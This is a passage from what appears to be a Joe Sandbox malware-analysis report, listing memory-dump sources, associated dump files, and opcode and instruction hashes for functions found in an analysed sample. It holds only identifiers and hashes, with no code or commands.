                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                      • Instruction ID: 37b2e6c19457ffa86963aa49433353b8de96043a07419fd236f7e22dab2f3076
                                      • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                      • Instruction Fuzzy Hash: 05D15DB560C3908FD7148F11C0A432BBFE0AF95718F18895EE4D90B391C3BA8548EF92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: a76c1d80a8982751c746625cb131d02dee8436cc2cd24a4d9b612fa97629e09e
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: 24B1AF72E083515BD308CF25C89136BF7E2EFC8310F1AC93EB99997281D774E9459A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction ID: 656d63b6f7d90b0bbeb85f268d082e88b9f446ac4bd76142cda823f9d5a300aa
                                      • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction Fuzzy Hash: ACB18072E083115BD308CF25C89175BF7E2EFC8310F5AC93EB89997291D778D9459A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction ID: 63830e3ab874baf3bc9fc205f4ac907b9b9f158c4ad3e6f8251689bf53387198
                                      • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction Fuzzy Hash: F0B10971A197118FD706EE3DC481225FBE1AFE6280F51C72EF895B7662EB31E8819740
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction ID: 389e49d99b4d2445042dcda111663652abf0946623c28977bcb7cb286d68b9a7
                                      • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction Fuzzy Hash: 7191C271E002158BEF55EE68DC80BFAB3A4FB55310F194565E918AB282D332ED05E7A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction ID: f176542c2ec575bbee7e1cd253412fe4bcfabec71b0324998f44c0754651ed63
                                      • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction Fuzzy Hash: 41B14C32A146099FEB15CF2CC486B647BE0FF45364F26865CE899CF2A2C775D981DB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction ID: bab75dcf66b0689f7a8754e69faafe9d7f7b3127b1240187f982163aa95b1dcb
                                      • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction Fuzzy Hash: 00C14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction ID: 91dee08403df90958c003bf7600ee974b77f7231da4de65e6676fc5e79df83c5
                                      • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction Fuzzy Hash: 5D9158319287906AFB169B38CC427AAB7A4FFE6350F54C31BF98C72491FB7185819346
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction ID: c1f998f96f3f629fe42dc7c6dc511030b932b5c83bd62ebebf0bcdc5865d41ac
                                      • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction Fuzzy Hash: 4CA11D72E10A19CBEB19CF55CCC1A9ABBB1FB58324F14C62AD41AE72A0D334A944CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction ID: 76ed651051228d59bafb3bf4f84f55d7cff9ebad01e6c248e463b1facd0cc2ba
                                      • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction Fuzzy Hash: 03A17E72E083119BD308CF25C89075BF7E2EFC8714F1ACA3DA89997254D774E8459B82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ef61e7d90914118c88ed15eea3a47d55ad53444c5fdbee08728383d0ae12ab8
                                      • Instruction ID: 5ffae20ae637a1f54dc2599a3fedad6d49d7d89436c8ee031a1dc1d03f9372a0
                                      • Opcode Fuzzy Hash: 1ef61e7d90914118c88ed15eea3a47d55ad53444c5fdbee08728383d0ae12ab8
                                      • Instruction Fuzzy Hash: 2051E2F3E082105FF3086A29EC55776B7DAEB94320F1A463DEE89D77C4ED3958048686
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 492083080b728b06252473903854bf9104ceb445cae3cadcb477f263382544c7
                                      • Instruction ID: c5ca0582d9eb86b0a4dfa727a5d8b49f5e29f71f3a8ba37cb7f4def109320f83
                                      • Opcode Fuzzy Hash: 492083080b728b06252473903854bf9104ceb445cae3cadcb477f263382544c7
                                      • Instruction Fuzzy Hash: 274111F3B192045FF748AA3DEC8573AB7C6DBE8720F1A853DE688C7385E87558054246
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00839e0a91d238b87ce4c03f2761378edfceccfda6937213309a77204a63022c
                                      • Instruction ID: 791682d247fb286b5b4d333af65dbcdfa4eab30bc87db1d7d1e0329e3349d91c
                                      • Opcode Fuzzy Hash: 00839e0a91d238b87ce4c03f2761378edfceccfda6937213309a77204a63022c
                                      • Instruction Fuzzy Hash: 944188F39082045FD3146D3EED9432AB799DFE4320F2A4639BB80D3784E8BA5911428A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 208ce138e227d5cad45eb8eca8e6e162e8c65ab360a1b19a5ffb26f0a3cf3ff2
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
